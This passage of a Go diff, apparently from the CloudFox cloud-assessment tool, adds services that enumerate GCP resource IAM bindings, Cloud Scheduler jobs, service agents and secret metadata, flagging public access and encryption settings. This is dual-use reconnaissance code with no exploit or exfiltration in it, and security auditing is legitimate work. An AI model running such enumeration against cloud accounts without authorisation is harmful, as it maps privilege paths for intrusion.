"google.golang.org/api/cloudfunctions/v1" +) + +// ResourceIAMService handles enumeration of resource-level IAM policies +type ResourceIAMService struct { + session *gcpinternal.SafeSession +} + +// New creates a new ResourceIAMService +func New() *ResourceIAMService { + return &ResourceIAMService{} +} + +// NewWithSession creates a ResourceIAMService with a SafeSession +func NewWithSession(session *gcpinternal.SafeSession) *ResourceIAMService { + return &ResourceIAMService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *ResourceIAMService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + +// ResourceIAMBinding represents an IAM binding on a specific resource +type ResourceIAMBinding struct { + ResourceType string `json:"resourceType"` // bucket, dataset, topic, secret, etc. + ResourceName string `json:"resourceName"` // Full resource name + ResourceID string `json:"resourceId"` // Short identifier + ProjectID string `json:"projectId"` + Role string `json:"role"` + Member string `json:"member"` + MemberType string `json:"memberType"` // user, serviceAccount, group, allUsers, allAuthenticatedUsers + MemberEmail string `json:"memberEmail"` + IsPublic bool `json:"isPublic"` // allUsers or allAuthenticatedUsers + HasCondition bool `json:"hasCondition"` + ConditionTitle string `json:"conditionTitle"` + ConditionExpression string `json:"conditionExpression"` // Full CEL expression +} + +// GetAllResourceIAM enumerates IAM policies across all supported resource types +func (s *ResourceIAMService) GetAllResourceIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var allBindings []ResourceIAMBinding + + // Get bucket IAM + bucketBindings, err := s.GetBucketIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, bucketBindings...) + } + + // Get BigQuery dataset IAM + bqBindings, err := s.GetBigQueryDatasetIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, bqBindings...) + } + + // Get Pub/Sub topic IAM + pubsubBindings, err := s.GetPubSubIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, pubsubBindings...) + } + + // Get Secret Manager IAM + secretBindings, err := s.GetSecretManagerIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, secretBindings...) + } + + // Get KMS IAM + kmsBindings, err := s.GetKMSIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, kmsBindings...) + } + + // Get Cloud Functions IAM + functionBindings, err := s.GetCloudFunctionsIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, functionBindings...) + } + + // Get Cloud Run IAM + runBindings, err := s.GetCloudRunIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, runBindings...) + } + + return allBindings, nil +} + +// GetBucketIAM enumerates IAM policies on Cloud Storage buckets +func (s *ResourceIAMService) GetBucketIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *storage.Client + var err error + if s.session != nil { + client, err = storage.NewClient(ctx, s.getClientOption()) + } else { + client, err = storage.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + defer client.Close() + + // List buckets + it := client.Buckets(ctx, projectID) + for { + bucketAttrs, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this bucket + bucket := client.Bucket(bucketAttrs.Name) + policy, err := bucket.IAM().Policy(ctx) + if err != nil { + continue + } + + // Convert policy to bindings + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "bucket", + ResourceName: fmt.Sprintf("gs://%s", bucketAttrs.Name), + ResourceID: bucketAttrs.Name, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + return bindings, nil +} + +// GetBigQueryDatasetIAM enumerates IAM policies on BigQuery datasets +func (s *ResourceIAMService) GetBigQueryDatasetIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *bigquery.Client + var err error + if s.session != nil { + client, err = bigquery.NewClient(ctx, projectID, s.getClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + defer client.Close() + + // List datasets + it := client.Datasets(ctx) + for { + dataset, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get metadata which includes access entries (IAM-like) + meta, err := dataset.Metadata(ctx) + if err != nil { + continue + } + + // BigQuery uses Access entries instead of IAM policies + for _, access := range meta.Access { + member := access.Entity + entityTypeStr := fmt.Sprintf("%v", access.EntityType) + + // Determine member type and if public based on entity type + isPublic := false + memberType := entityTypeStr + + switch access.EntityType { + case bigquery.UserEmailEntity: + memberType = "User" + member = "user:" + access.Entity + case bigquery.GroupEmailEntity: + memberType = "Group" + member = "group:" + access.Entity + case bigquery.DomainEntity: + memberType = "Domain" + member = "domain:" + access.Entity + case bigquery.SpecialGroupEntity: + // Special groups include allAuthenticatedUsers + if access.Entity == "allAuthenticatedUsers" { + memberType = "allAuthenticatedUsers" + member = "allAuthenticatedUsers" + isPublic = true + } else { + memberType = "SpecialGroup" + } + case bigquery.IAMMemberEntity: + memberType = determineMemberType(access.Entity) + isPublic = isPublicMember(access.Entity) + } + + if member == "" { + continue + } + + binding := ResourceIAMBinding{ + ResourceType: "dataset", + ResourceName: fmt.Sprintf("%s.%s", projectID, dataset.DatasetID), + ResourceID: dataset.DatasetID, + ProjectID: projectID, + Role: string(access.Role), + Member: member, + MemberType: memberType, + MemberEmail: extractEmail(member), + IsPublic: isPublic, + } + bindings = append(bindings, binding) + } + } + + return bindings, nil +} + +// GetPubSubIAM enumerates IAM policies on Pub/Sub topics and subscriptions +func (s *ResourceIAMService) GetPubSubIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *pubsub.Client + var err error + if s.session != nil { + client, err = pubsub.NewClient(ctx, projectID, s.getClientOption()) + } else { + client, err = pubsub.NewClient(ctx, projectID) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + defer client.Close() + + // List topics + topicIt := client.Topics(ctx) + for { + topic, err := topicIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this topic + policy, err := topic.IAM().Policy(ctx) + if err != nil { + continue + } + + topicID := topic.ID() + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "topic", + ResourceName: fmt.Sprintf("projects/%s/topics/%s", projectID, topicID), + ResourceID: topicID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + // List subscriptions + subIt := client.Subscriptions(ctx) + for { + sub, err := subIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this subscription + policy, err := sub.IAM().Policy(ctx) + if err != nil { + continue + } + + subID := sub.ID() + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "subscription", + ResourceName: fmt.Sprintf("projects/%s/subscriptions/%s", projectID, subID), + ResourceID: subID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + return bindings, nil +} + +// GetSecretManagerIAM enumerates IAM policies on Secret Manager secrets +func (s *ResourceIAMService) GetSecretManagerIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var smService *secretmanager.Service + var err error + if s.session != nil { + smService, err = secretmanager.NewService(ctx, s.getClientOption()) + } else { + smService, err = secretmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + // List secrets + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := smService.Projects.Secrets.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + for _, secret := range resp.Secrets { + // Get IAM policy for this secret + policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Context(ctx).Do() + if err != nil { + continue + } + + secretID := extractSecretID(secret.Name) + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "secret", + ResourceName: secret.Name, + ResourceID: secretID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// GetKMSIAM enumerates IAM policies on KMS keys +func (s *ResourceIAMService) GetKMSIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *kms.KeyManagementClient + var err error + if s.session != nil { + client, err = kms.NewKeyManagementClient(ctx, s.getClientOption()) + } else { + client, err = kms.NewKeyManagementClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + defer client.Close() + + // List key rings in all locations + locations := []string{"global", "us", "us-central1", "us-east1", "us-west1", "europe-west1", "asia-east1"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + + keyRingIt := client.ListKeyRings(ctx, &kmspb.ListKeyRingsRequest{Parent: parent}) + for { + keyRing, err := keyRingIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // List keys in this key ring + keyIt := client.ListCryptoKeys(ctx, &kmspb.ListCryptoKeysRequest{Parent: keyRing.Name}) + for { + key, err := keyIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this key + policy, err := client.ResourceIAM(key.Name).Policy(ctx) + if err != nil { + continue + } + + keyID := extractKeyID(key.Name) + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "cryptoKey", + ResourceName: key.Name, + ResourceID: keyID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + } + } + + return bindings, nil +} + +// GetCloudFunctionsIAM enumerates IAM policies on Cloud Functions +func (s *ResourceIAMService) GetCloudFunctionsIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var cfService *cloudfunctions.Service + var err error + if s.session != nil { + cfService, err = cloudfunctions.NewService(ctx, s.getClientOption()) + } else { + cfService, err = cloudfunctions.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + // List functions across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := cfService.Projects.Locations.Functions.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + for _, fn := range resp.Functions { + // Get IAM policy for this function + policy, err := cfService.Projects.Locations.Functions.GetIamPolicy(fn.Name).Context(ctx).Do() + if err != nil { + continue + } + + fnID := extractFunctionID(fn.Name) + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "function", + ResourceName: fn.Name, + ResourceID: fnID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// GetCloudRunIAM enumerates IAM policies on Cloud Run services +func (s *ResourceIAMService) GetCloudRunIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var runService *run.APIService + var err error + if s.session != nil { + runService, err = run.NewService(ctx, s.getClientOption()) + } else { + runService, err = run.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + // List services across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + for _, svc := range resp.Items { + // Get IAM policy for this service + policy, err := runService.Projects.Locations.Services.GetIamPolicy(svc.Metadata.Name).Context(ctx).Do() + if err != nil { + continue + } + + svcID := svc.Metadata.Name + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "cloudrun", + ResourceName: svc.Metadata.Name, + ResourceID: svcID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// Helper functions + +func determineMemberType(member string) string { + switch { + case member == "allUsers": + return "allUsers" + case member == "allAuthenticatedUsers": + return "allAuthenticatedUsers" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "principal:"): + return "Federated" + case strings.HasPrefix(member, "principalSet:"): + return "FederatedSet" + default: + return "Unknown" + } +} + +func extractEmail(member string) string { + if strings.Contains(member, ":") { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + } + return member +} + +func isPublicMember(member string) bool { + return member == "allUsers" || member == "allAuthenticatedUsers" +} + +func extractSecretID(name string) string { + // Format: projects/{project}/secrets/{secret} + parts := strings.Split(name, "/") + if len(parts) >= 4 { + return parts[len(parts)-1] + } + return name +} + +func extractKeyID(name string) string { + // Format: projects/{project}/locations/{location}/keyRings/{keyring}/cryptoKeys/{key} + parts := strings.Split(name, "/") + if len(parts) >= 8 { + return parts[len(parts)-1] + } + return name +} + +func extractFunctionID(name string) string { + // Format: projects/{project}/locations/{location}/functions/{function} + parts := strings.Split(name, "/") + if len(parts) >= 6 { + return parts[len(parts)-1] + } + return name +} diff --git a/gcp/services/schedulerService/schedulerService.go b/gcp/services/schedulerService/schedulerService.go new file mode 100644 index 00000000..69b617a7 --- /dev/null +++ b/gcp/services/schedulerService/schedulerService.go @@ -0,0 +1,165 @@ +package schedulerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + scheduler "google.golang.org/api/cloudscheduler/v1" +) + +type SchedulerService struct{} + +func New() *SchedulerService { + return &SchedulerService{} +} + +// JobInfo holds Cloud Scheduler job details with security-relevant information +type JobInfo struct { + Name string + ProjectID string + Location string + Description string + State string // ENABLED, PAUSED, DISABLED, UPDATE_FAILED + Schedule string // Cron expression + TimeZone string + + // Target configuration + TargetType string // http, pubsub, appengine + TargetURI string // For HTTP targets + TargetHTTPMethod string // For HTTP targets + TargetTopic string // For Pub/Sub targets + TargetService string // For App Engine targets + TargetVersion string // For App Engine targets + + // Authentication + ServiceAccount string // OIDC or OAuth service account + AuthType string // OIDC, OAuth, or none + + // Retry configuration + RetryCount int64 + MaxRetryDuration string + MaxBackoff string + + // Timing + LastAttemptTime string + ScheduleTime string + Status string // Last attempt status +} + +// Jobs retrieves all Cloud Scheduler jobs in a project +func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := scheduler.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudscheduler.googleapis.com") + } + + var jobs []JobInfo + + // List jobs across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Jobs.List(parent) + err = call.Pages(ctx, func(page *scheduler.ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + jobs = append(jobs, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudscheduler.googleapis.com") + } + + return jobs, nil +} + +// parseJobInfo extracts relevant information from a Cloud Scheduler job +func parseJobInfo(job *scheduler.Job, projectID string) JobInfo { + info := JobInfo{ + Name: extractName(job.Name), + ProjectID: projectID, + Description: job.Description, + State: job.State, + Schedule: job.Schedule, + TimeZone: job.TimeZone, + } + + // Extract location from job name + // Format: projects/{project}/locations/{location}/jobs/{name} + parts := strings.Split(job.Name, "/") + if len(parts) >= 4 { + info.Location = parts[3] + } + + // Parse target configuration + if job.HttpTarget != nil { + info.TargetType = "http" + info.TargetURI = job.HttpTarget.Uri + info.TargetHTTPMethod = job.HttpTarget.HttpMethod + + // Check for OIDC token + if job.HttpTarget.OidcToken != nil { + info.AuthType = "OIDC" + info.ServiceAccount = job.HttpTarget.OidcToken.ServiceAccountEmail + } + + // Check for OAuth token + if job.HttpTarget.OauthToken != nil { + info.AuthType = "OAuth" + info.ServiceAccount = job.HttpTarget.OauthToken.ServiceAccountEmail + } + } + + if job.PubsubTarget != nil { + info.TargetType = "pubsub" + info.TargetTopic = extractName(job.PubsubTarget.TopicName) + } + + if job.AppEngineHttpTarget != nil { + info.TargetType = "appengine" + info.TargetURI = job.AppEngineHttpTarget.RelativeUri + info.TargetHTTPMethod = job.AppEngineHttpTarget.HttpMethod + if job.AppEngineHttpTarget.AppEngineRouting != nil { + info.TargetService = job.AppEngineHttpTarget.AppEngineRouting.Service + info.TargetVersion = job.AppEngineHttpTarget.AppEngineRouting.Version + } + } + + // Retry configuration + if job.RetryConfig != nil { + info.RetryCount = job.RetryConfig.RetryCount + info.MaxRetryDuration = job.RetryConfig.MaxRetryDuration + info.MaxBackoff = job.RetryConfig.MaxBackoffDuration + } + + // Timing info + info.LastAttemptTime = job.LastAttemptTime + info.ScheduleTime = job.ScheduleTime + if job.Status != nil { + info.Status = formatJobStatus(job.Status) + } + + return info +} + +// formatJobStatus formats the job status for display +func formatJobStatus(status *scheduler.Status) string { + if status.Code == 0 { + return "OK" + } + return fmt.Sprintf("Error %d: %s", status.Code, status.Message) +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/secretsService/secretsService.go b/gcp/services/secretsService/secretsService.go index 75b9f510..e9ff9357 100644 --- a/gcp/services/secretsService/secretsService.go +++ b/gcp/services/secretsService/secretsService.go @@ -2,11 +2,18 @@ package secretservice import ( "context" + "encoding/json" "fmt" + "io" + "net/http" + "strings" + "time" secretmanager "cloud.google.com/go/secretmanager/apiv1" secretmanagerpb "cloud.google.com/go/secretmanager/apiv1/secretmanagerpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" + "golang.org/x/oauth2/google" "google.golang.org/api/iterator" ) @@ -18,6 +25,8 @@ type Iterator interface { type SecretsManagerClientWrapper struct { Closer func() error SecretLister func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator + IAMGetter func(ctx context.Context, secretName string) (*secretmanagerpb.Secret, error) + rawClient *secretmanager.Client } func (w *SecretsManagerClientWrapper) Close() error { @@ -26,14 +35,14 @@ func (w *SecretsManagerClientWrapper) Close() error { func (w *SecretsManagerClientWrapper) ListSecrets(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { return w.SecretLister(ctx, req, opts...) - } type SecretsService struct { - Client *SecretsManagerClientWrapper + Client *SecretsManagerClientWrapper + session *gcpinternal.SafeSession } -// New function to facilitate using the ss client +// New creates a SecretsService with the provided client func New(client *secretmanager.Client) SecretsService { ss := SecretsService{ Client: &SecretsManagerClientWrapper{ @@ -41,17 +50,88 @@ func New(client *secretmanager.Client) SecretsService { SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { return client.ListSecrets(ctx, req, opts...) }, + rawClient: client, }, } return ss } +// NewWithSession creates a SecretsService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) (SecretsService, error) { + ctx := context.Background() + var client *secretmanager.Client + var err error + + if session != nil { + client, err = secretmanager.NewClient(ctx, session.GetClientOption()) + } else { + client, err = secretmanager.NewClient(ctx) + } + if err != nil { + return SecretsService{}, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + ss := SecretsService{ + Client: &SecretsManagerClientWrapper{ + Closer: client.Close, + SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { + return client.ListSecrets(ctx, req, opts...) + }, + rawClient: client, + }, + session: session, + } + return ss, nil +} + +// IAMBinding represents a single IAM binding on a secret +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// SecretInfo contains secret metadata and security-relevant configuration type SecretInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectID"` - CreationTime string `json:"creationTime"` - Labels map[string]string `json:"labels"` - Rotation string `json:"rotation,omitempty"` + // Basic info + Name string `json:"name"` + ProjectID string `json:"projectID"` + + // Timestamps + CreationTime string `json:"creationTime"` + + // Replication + ReplicationType string `json:"replicationType"` // "automatic" or "user-managed" + ReplicaLocations []string `json:"replicaLocations,omitempty"` // Locations for user-managed replication + + // Encryption + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName,omitempty"` // KMS key for CMEK + + // Expiration + HasExpiration bool `json:"hasExpiration"` + ExpireTime string `json:"expireTime,omitempty"` + TTL string `json:"ttl,omitempty"` + + // Rotation + Rotation string `json:"rotation,omitempty"` + NextRotationTime string `json:"nextRotationTime,omitempty"` + RotationPeriod string `json:"rotationPeriod,omitempty"` + + // Version Management + VersionDestroyTTL string `json:"versionDestroyTtl,omitempty"` // Delayed destruction + + // Metadata + Labels map[string]string `json:"labels,omitempty"` + Annotations map[string]string `json:"annotations,omitempty"` + + // Topics (Pub/Sub notifications) + Topics []string `json:"topics,omitempty"` + + // Version Aliases + VersionAliases map[string]int64 `json:"versionAliases,omitempty"` + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings,omitempty"` } func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { @@ -63,21 +143,234 @@ func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { ctx := context.Background() it := ss.Client.ListSecrets(ctx, req) for { - resp, err := it.Next() //Here it errors out + resp, err := it.Next() if err == iterator.Done { break } if err != nil { - return nil, fmt.Errorf("failed to list secrets: %v", err) + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") } - secrets = append(secrets, SecretInfo{ + secret := SecretInfo{ Name: resp.Name, ProjectID: projectID, - CreationTime: resp.CreateTime.AsTime().String(), + CreationTime: resp.CreateTime.AsTime().Format(time.RFC3339), Labels: resp.Labels, - Rotation: resp.Rotation.String(), - }) + Annotations: resp.Annotations, + } + + // Parse replication type + if resp.Replication != nil { + switch r := resp.Replication.Replication.(type) { + case *secretmanagerpb.Replication_Automatic_: + secret.ReplicationType = "automatic" + // Check for CMEK in automatic replication + if r.Automatic != nil && r.Automatic.CustomerManagedEncryption != nil { + secret.EncryptionType = "CMEK" + secret.KMSKeyName = r.Automatic.CustomerManagedEncryption.KmsKeyName + } else { + secret.EncryptionType = "Google-managed" + } + case *secretmanagerpb.Replication_UserManaged_: + secret.ReplicationType = "user-managed" + if r.UserManaged != nil { + for _, replica := range r.UserManaged.Replicas { + secret.ReplicaLocations = append(secret.ReplicaLocations, replica.Location) + // Check for CMEK in user-managed replication + if replica.CustomerManagedEncryption != nil { + secret.EncryptionType = "CMEK" + secret.KMSKeyName = replica.CustomerManagedEncryption.KmsKeyName + } + } + } + if secret.EncryptionType == "" { + secret.EncryptionType = "Google-managed" + } + } + } + + // Parse expiration + if resp.Expiration != nil { + secret.HasExpiration = true + switch e := resp.Expiration.(type) { + case *secretmanagerpb.Secret_ExpireTime: + if e.ExpireTime != nil { + secret.ExpireTime = e.ExpireTime.AsTime().Format(time.RFC3339) + } + case *secretmanagerpb.Secret_Ttl: + if e.Ttl != nil { + secret.TTL = e.Ttl.AsDuration().String() + } + } + } + + // Parse rotation + if resp.Rotation != nil { + secret.Rotation = "enabled" + if resp.Rotation.NextRotationTime != nil { + secret.NextRotationTime = resp.Rotation.NextRotationTime.AsTime().Format(time.RFC3339) + } + if resp.Rotation.RotationPeriod != nil { + secret.RotationPeriod = resp.Rotation.RotationPeriod.AsDuration().String() + } + } else { + secret.Rotation = "disabled" + } + + // Get VersionDestroyTTL via REST API (may not be available in all SDK versions) + ss.enrichSecretFromRestAPI(ctx, &secret) + + // Parse topics + if len(resp.Topics) > 0 { + for _, topic := range resp.Topics { + secret.Topics = append(secret.Topics, topic.Name) + } + } + + // Parse version aliases + if len(resp.VersionAliases) > 0 { + secret.VersionAliases = resp.VersionAliases + } + + // Get IAM policy for the secret + iamBindings := ss.getSecretIAMPolicy(ctx, resp.Name) + secret.IAMBindings = iamBindings + + secrets = append(secrets, secret) } return secrets, nil } + +// getSecretIAMPolicy retrieves the IAM policy for a secret +func (ss *SecretsService) getSecretIAMPolicy(ctx context.Context, secretName string) []IAMBinding { + var bindings []IAMBinding + + if ss.Client.rawClient == nil { + return bindings + } + + // Get IAM policy using the raw client + policy, err := ss.Client.rawClient.IAM(secretName).Policy(ctx) + if err != nil { + // Return empty bindings if we can't get the policy (permission denied, etc.) + return bindings + } + + // Convert IAM policy to our binding format + for _, role := range policy.Roles() { + members := policy.Members(role) + if len(members) > 0 { + binding := IAMBinding{ + Role: string(role), + Members: make([]string, len(members)), + } + for i, member := range members { + binding.Members[i] = member + } + bindings = append(bindings, binding) + } + } + + return bindings +} + +// FormatIAMBindings formats IAM bindings for display +func FormatIAMBindings(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "No IAM bindings" + } + + var parts []string + for _, binding := range bindings { + memberStr := strings.Join(binding.Members, ", ") + parts = append(parts, fmt.Sprintf("%s: [%s]", binding.Role, memberStr)) + } + return strings.Join(parts, "; ") +} + +// FormatIAMBindingsShort formats IAM bindings in a shorter format for table display +func FormatIAMBindingsShort(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "-" + } + return fmt.Sprintf("%d binding(s)", len(bindings)) +} + +// secretAPIResponse represents the raw JSON response from Secret Manager API +// to capture fields that may not be in the SDK yet +type secretAPIResponse struct { + VersionDestroyTtl string `json:"versionDestroyTtl,omitempty"` +} + +// enrichSecretFromRestAPI fetches additional secret fields via direct HTTP request +// that may not be available in the Go SDK version +func (ss *SecretsService) enrichSecretFromRestAPI(ctx context.Context, secret *SecretInfo) { + var accessToken string + + // Try to use session token if available + if ss.session != nil { + token, err := ss.session.GetToken(ctx) + if err == nil { + accessToken = token + } + } + + // Fall back to default credentials if no session token + if accessToken == "" { + creds, err := google.FindDefaultCredentials(ctx, "https://www.googleapis.com/auth/cloud-platform") + if err != nil { + return + } + token, err := creds.TokenSource.Token() + if err != nil { + return + } + accessToken = token.AccessToken + } + + // Build the API URL + // Secret name format: projects/{project}/secrets/{secret} + url := fmt.Sprintf("https://secretmanager.googleapis.com/v1/%s", secret.Name) + + // Create request + req, err := http.NewRequestWithContext(ctx, "GET", url, nil) + if err != nil { + return + } + req.Header.Set("Authorization", "Bearer "+accessToken) + + // Make request + client := &http.Client{} + resp, err := client.Do(req) + if err != nil { + return + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return + } + + // Read response body + body, err := io.ReadAll(resp.Body) + if err != nil { + return + } + + // Parse JSON + var apiResp secretAPIResponse + if err := json.Unmarshal(body, &apiResp); err != nil { + return + } + + // Parse VersionDestroyTTL + if apiResp.VersionDestroyTtl != "" { + // Parse duration string (e.g., "86400s" for 1 day) + if dur, err := time.ParseDuration(apiResp.VersionDestroyTtl); err == nil { + secret.VersionDestroyTTL = dur.String() + } else { + // If parsing fails, use the raw value + secret.VersionDestroyTTL = apiResp.VersionDestroyTtl + } + } +} diff --git a/gcp/services/serviceAgentsService/serviceAgentsService.go b/gcp/services/serviceAgentsService/serviceAgentsService.go new file mode 100644 index 00000000..1288d029 --- /dev/null +++ b/gcp/services/serviceAgentsService/serviceAgentsService.go @@ -0,0 +1,236 @@ +package serviceagentsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" +) + +type ServiceAgentsService struct{} + +func New() *ServiceAgentsService { + return &ServiceAgentsService{} +} + +// ServiceAgentInfo represents a Google-managed service agent +type ServiceAgentInfo struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + ServiceName string `json:"serviceName"` + AgentType string `json:"agentType"` // compute, gke, cloudbuild, etc. + Roles []string `json:"roles"` + IsCrossProject bool `json:"isCrossProject"` + Description string `json:"description"` +} + +// KnownServiceAgents maps service agent patterns to their descriptions +var KnownServiceAgents = map[string]struct { + Service string + Description string +}{ + "@cloudservices.gserviceaccount.com": { + Service: "Google APIs", + Description: "Google APIs Service Agent - manages resources on behalf of Google Cloud services", + }, + "@compute-system.iam.gserviceaccount.com": { + Service: "Compute Engine", + Description: "Compute Engine Service Agent - manages Compute Engine resources", + }, + "@container-engine-robot.iam.gserviceaccount.com": { + Service: "GKE", + Description: "Kubernetes Engine Service Agent - manages GKE clusters", + }, + "@cloudbuild.gserviceaccount.com": { + Service: "Cloud Build", + Description: "Cloud Build Service Account - runs build jobs", + }, + 